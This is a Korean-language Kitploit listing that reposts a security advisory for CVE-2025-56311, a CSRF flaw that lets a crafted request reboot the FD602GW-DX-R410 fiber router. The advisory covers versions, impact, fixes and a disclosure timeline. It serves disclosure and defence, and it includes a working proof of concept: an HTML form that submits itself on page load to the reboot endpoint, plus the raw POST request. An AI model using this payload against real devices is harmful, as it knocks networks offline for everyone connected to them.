Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-56311 — FD602GW-DX-R410 라우터의 CSRF 취약점으로 인해 인증된 관리자가 있을 때 원격 공격자가 /boaform/admin/formReboot로 조작된 POST 요청을 통해 장치를 재부팅할 수 있습니다. | Kitploit
도구/GitHubGitHub/wrathfuldiety/cve-2025-56311
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingPapers & ResearchLearning & Education
GitHubwrathfuldiety/cve-2025-56311

CVE-2025-56311

FD602GW-DX-R410 라우터의 CSRF 취약점으로 인해 인증된 관리자가 있을 때 원격 공격자가 /boaform/admin/formReboot로 조작된 POST 요청을 통해 장치를 재부팅할 수 있습니다.

저장소 보기
61년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-56311: 보안 권고 – FD602GW-DX-R410 라우터 재부팅 기능의 CSRF 취약점

FD602GW-DX-R410 광섬유 라우터의 관리 인터페이스(펌웨어 V2.2.14)에서 발견된 CSRF(Cross-Site Request Forgery) 취약점에 대한 개념 증명 및 보안 권고입니다. 이 권고는 영향, 공격 벡터 및 해결 방법을 설명합니다.

fd602gw-dx-r410-csrf-advisory

FD602GW-DX-R410 라우터의 CSRF 취약점으로 인해 인증된 관리자가 있는 경우 원격 공격자가 /boaform/admin/formReboot로 조작된 POST 요청을 보내 장치를 재부팅할 수 있습니다.


개요

FD602GW-DX-R410 광섬유 라우터의 웹 기반 관리 콘솔(펌웨어 V2.2.14)에서 CSRF(Cross-Site Request Forgery) 취약점이 발견되었습니다. /boaform/admin/formReboot 엔드포인트는 CSRF 토큰이나 출처 검증 없이 POST 요청을 통해 장치 전체를 재부팅할 수 있습니다. 인증된 관리자가 악성 페이지를 방문하면 동의 없이 라우터가 원격으로 재부팅될 수 있습니다.

  • CVE ID: CVE-2025-56311
  • 권고 공개 날짜: 2025년 7월
  • 발견자: Hasanka Amarasinghe (독립 보안 연구원)
  • 공급업체: Shenzhen C-Data Technology Co., Ltd.
  • 영향 받는 제품: FD602GW-DX-R410 광섬유 라우터
  • 펌웨어 버전: V2.2.14 (Build.1918.241111)
  • 하드웨어 버전: R410.1B
  • 부트로더 버전: V3.7-2312181457
  • 웹 서버: Boa/0.93.15
  • 접근 벡터: 원격 (인증된 관리자가 로그인되어 있어야 함)
  • 심각도: 중간
  • CVSS v3.1 기본 점수: 5.4 (중간)

영향을 받는 제품

  • 장치: FD602GW-DX-R410 광섬유 라우터
  • 펌웨어: V2.2.14 (Build.1918.241111)
  • 구성 요소: 재부팅 핸들러 - /boaform/admin/formReboot
  • 웹 서버: Boa/0.93.15

취약점 상세

  • 유형: CSRF(Cross-Site Request Forgery)
  • 공격 벡터: 원격 (관리자가 세션에 로그인되어 있어야 함)
  • 인증: 공격자에게 필요 없음 (피해자 브라우저에 관리자 세션 필요)
  • 영향: 장치의 무단 재부팅
  • 상태 지속성: 무상태 세션, IP 또는 내부 세션 토큰을 통해 추적될 가능성

개념 증명 (PoC)

CSRF 페이로드 (HTML)

<html>
  <!-- CSRF PoC - generated by Burp Suite Pro -->
  <body>
    <form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
      <input type="hidden" name="postSecurityFlag" value="+65535" />
      <input type="submit" value="Submit" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

HTTP 요청

POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23

postSecurityFlag=+65535

응답

HTTP 200 OK; 라우터가 즉시 재부팅됩니다.


권장 사항

  • 모든 관리 엔드포인트에 CSRF 토큰 구현 및 엄격한 Origin/Referer 검증.
  • 오래되었거나 고립된 세션을 무효화하고 세션을 보안 쿠키에 바인딩.
  • 재부팅과 같은 파괴적인 작업을 실행하기 전에 CAPTCHA 또는 확인 프롬프트 고려.
  • 관리 인터페이스 접근을 신뢰할 수 있는 IP 또는 내부 네트워크로만 제한.

공격 벡터

라우터 관리자가 인증(로그인)되어 있어야 합니다. 공격자는 피해자를 악성 웹페이지로 유인하여 재부팅 엔드포인트에 대한 POST 요청을 조용히 트리거합니다. 라우터는 위조된 요청을 수락하고 즉시 재부팅되어 서비스 거부를 유발합니다.


영향

  • 강제 재부팅으로 인한 서비스 거부.
  • 연결된 모든 사용자의 네트워크 가용성 손실.
  • 다른 문제(예: 세션 하이재킹 또는 XSS)와 연계하여 영향을 높일 가능성.

공개 타임라인

DateAction
Jun 2025취약점 발견
Jun 2025책임 있는 공개 시도 (응답 없음)
Jul 2025MITRE에 CVE ID 요청
Jul 2025권고 준비 및 게시 대기 중
Sep 2025CVE 할당, 권고 공개

참고 자료

  • 공급업체: Shenzhen C-Data Technology Co., Ltd.
  • 장치: FD602GW-DX-R410
  • 펌웨어: V2.2.14
  • GitHub 권고: https://github.com/wrathfulDiety/CVE-2025-56311

면책 조항

이 권고는 교육 및 보안 인식 목적으로 제공됩니다. 작성자는 오용에 대한 책임을 지지 않습니다. 모든 테스트는 통제된 환경에서 수행되었습니다.

도구 다운로드